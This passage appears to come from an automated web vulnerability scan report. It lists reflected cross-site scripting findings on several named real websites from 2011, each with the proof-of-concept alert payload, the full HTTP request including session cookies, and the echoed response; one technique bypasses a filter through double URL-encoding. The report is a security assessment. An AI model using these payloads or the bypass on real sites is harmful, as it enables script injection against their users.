3.52. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [x-lr2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The value of the x-lr2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e302"><script>alert(1)</script>4898dfa5535 was submitted in the x-lr2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/269171e302"><script>alert(1)</script>4898dfa5535&page= HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:49 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1315

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/269171e302"><script>alert(1)</script>4898dfa5535&page=" />
...[SNIP]...
3.53. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7052c%253balert%25281%2529%252f%252f161ddd4d8be was submitted in the REST URL parameter 4. This input was echoed as 7052c;alert(1)//161ddd4d8be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C7052c%253balert%25281%2529%252f%252f161ddd4d8be/script%3E8b27daf9eeb HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:18 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1306

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<7052c;alert(1)//161ddd4d8be/script>
...[SNIP]...
3.54. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bcb6"><script>alert(1)</script>10d38451814 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/2bcb6"><script>alert(1)</script>10d38451814/script%3E8b27daf9eeb HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:17 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1292

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/2bcb6"><script>alert(1)</script>10d38451814/script>
...[SNIP]...
3.55. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 43cae%253balert%25281%2529%252f%252f4db97354d1c was submitted in the REST URL parameter 5. This input was echoed as 43cae;alert(1)//4db97354d1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/43cae%253balert%25281%2529%252f%252f4db97354d1c HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:19 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1288

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
</43cae;alert(1)//4db97354d1c" />
...[SNIP]...
3.56. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f0e85<script>alert(1)</script>334b249d7a7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eebf0e85<script>alert(1)</script>334b249d7a7 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:20 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1320

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
</script>8b27daf9eebf0e85<script>alert(1)</script>334b249d7a7" />
...[SNIP]...
3.57. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9d3da<script>alert(1)</script>c5f0d095866 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb?9d3da<script>alert(1)</script>c5f0d095866=1 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:15 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1323

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
</script>8b27daf9eeb?9d3da<script>alert(1)</script>c5f0d095866=1" />
...[SNIP]...
3.58. http://weblogs.sdn.sap.com/cs/user/login [x-redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/login

Issue detail

The value of the x-redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59301"><script>alert(1)</script>f5151cfe29d was submitted in the x-redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cs/user/login?x-redirect=59301"><script>alert(1)</script>f5151cfe29d HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/269171e302%22%3E%3Cscript%3Ealert(1)%3C/script%3E4898dfa5535&page=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:08 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1257

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="59301"><script>alert(1)</script>f5151cfe29d" />
...[SNIP]...
3.59. http://weblogs.sdn.sap.com/cs/user/login [x-redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/login

Issue detail

The value of the x-redirect request parameter is copied into the HTML document as plain text between tags. The payload 85ee1<script>alert(1)</script>875fad350be was submitted in the x-redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cs/user/login?x-redirect=/cs/user/create/cs_msg%3Fx-lr=cs_disc%2F%26x-lr2=wlg%2F269171e302%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4898dfa5535%26page=85ee1<script>alert(1)</script>875fad350be HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/269171e302%22%3E%3Cscript%3Ealert(1)%3C/script%3E4898dfa5535&page=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:08 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1356

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
</script>4898dfa5535&page=85ee1<script>alert(1)</script>875fad350be" />
...[SNIP]...
3.60. http://www.asugonline.com/weborb.aspx [2nd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.asugonline.com
Path:   /weborb.aspx

Issue detail

The value of the 2nd AMF string parameter is copied into the HTML document as plain text between tags. The payload 959bb<script>alert(1)</script>75f3445b5e2 was submitted in the 2nd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /weborb.aspx HTTP/1.1
Host: www.asugonline.com
Proxy-Connection: keep-alive
Content-Length: 244
Origin: http://www.asugonline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
content-type: application/x-amf
Accept: */*
Referer: http://www.asugonline.com/swfs/MainApp.swf?ver2.0.11159
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hi12vc2iab2rdx45ml1cpz55; CmsAdmin=eventid=1&languageid=1; X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

........null../1.....    ..
..Mflex.messaging.messages.CommandMessage.timestamp.headers.operation    body.correlationId.messageId.timeToLive.clientId.destination.........
#.%DSMessagingVersion    DSId....nil..
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-amf
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:26:35 GMT
Content-Length: 392

......../1/onResult.......
..Uflex.messaging.messages.AcknowledgeMessage.timestamp    body.timeToLive.destination.messageId.clientId.headers.correlationId.Bs0q..P......I0553731E-0C94-4545-B5BF-7C58F43507D1.IAD29185E-71B2-4A92-9380-E717F59B83AB
#.    DSId.SESSION_TIMEOUT.I543E9256-9A42-4448-BF24-0863F9EAFBD8..Bs0...P....8FAA4598-09EC-DBAF-B0AA-07F947741977959bb<script>alert(1)</script>75f3445b5e2
3.61. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

